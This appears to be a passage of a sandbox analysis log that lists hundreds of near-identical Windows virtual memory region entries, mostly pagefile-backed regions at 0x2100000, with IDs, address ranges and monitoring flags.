region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19859 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 19860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19861 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19862 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19863 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19864 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19865 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19866 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19867 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19868 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19869 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19870 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19871 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19872 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19873 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19874 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19875 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19876 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19877 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19878 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19879 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19880 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19881 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19882 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19883 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19884 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19885 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19886 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19887 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19888 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19889 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19890 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19891 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19892 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19893 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19894 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19895 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19896 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19897 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19898 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19899 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19900 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19901 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19902 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19903 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19904 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19905 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19906 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19907 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19908 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19909 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19910 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19911 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19912 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19913 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19914 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19915 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19916 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19917 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19918 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19919 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19920 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19921 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19922 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19923 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19924 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19925 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19926 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19927 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19928 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19929 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19930 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19931 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19932 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19933 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19934 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19935 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19936 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19937 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19938 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19939 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19940 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19941 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19942 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19943 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19944 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19945 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19946 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19947 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19948 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19949 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19950 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19951 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19952 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19953 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19954 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19955 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19956 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19957 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19958 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19959 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 19960 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 19961 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19962 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19963 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19964 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19965 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19966 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19967 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19968 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19969 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19970 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19971 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19972 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19973 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19974 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19975 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19976 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19977 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19978 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19979 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19980 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19981 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19982 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19983 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19984 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19985 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19986 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19987 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19988 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19989 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19990 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19991 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19992 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19993 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19994 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19995 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19996 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19997 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19998 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19999 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20000 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20001 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20002 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20003 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20004 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20005 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20006 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20007 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20008 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20009 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20010 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20011 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20012 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20013 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20014 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20015 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20016 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20017 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20018 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20019 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20020 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20021 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20022 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20023 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20024 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20025 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20026 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20027 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20028 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20029 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20030 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20031 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20032 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20033 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20034 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20035 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20036 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20037 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20038 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20039 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20040 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20041 start_va = 0x2100000 